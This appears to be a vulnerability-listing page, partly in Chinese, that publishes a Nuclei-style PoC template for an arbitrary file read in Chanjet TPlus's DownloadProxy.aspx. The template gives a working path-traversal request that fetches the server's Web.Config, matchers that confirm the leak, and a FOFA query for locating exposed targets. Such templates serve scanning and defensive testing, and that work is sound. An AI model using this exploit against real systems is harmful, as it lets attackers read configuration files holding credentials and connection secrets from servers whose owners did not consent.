chanjet-tplus-file-read: Chanjet TPlus DownloadProxy.aspx - Arbitrary File Read

日期: 2025-08-01 | 影响软件: Chanjet TPlus | POC: 已公开

漏洞描述

Chanjet TPlus DownloadProxy.aspx file has an arbitrary file reading vulnerability. An attacker can obtain sensitive files on the server through the vulnerability.

PoC代码[已公开]

id: chanjet-tplus-file-read

info:
  name: Chanjet TPlus DownloadProxy.aspx - Arbitrary File Read
  author: SleepingBag945
  severity: high
  description: |
    Chanjet TPlus DownloadProxy.aspx file has an arbitrary file reading vulnerability. An attacker can obtain sensitive files on the server through the vulnerability.
  reference:
    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9AT%2B%20DownloadProxy.aspx%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="畅捷通-TPlus"
  tags: yonyou,chanjet,lfi,tplus,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "xml version"
          - "<configuration>"
        condition: and

      - type: word
        part: header
        words:
          - "application/octet-stream"
# digest: 4a0a00473045022100924da80dcf1f7ca891613d551f5e4b081b54cceb695320e93043efac377fc4cc0220563dd33fabe633220446a02573b92b2170dc17c12eaafc071ee9bb37f54f4ae9:922c64590222798bb761d5b6d8e72950

相关漏洞推荐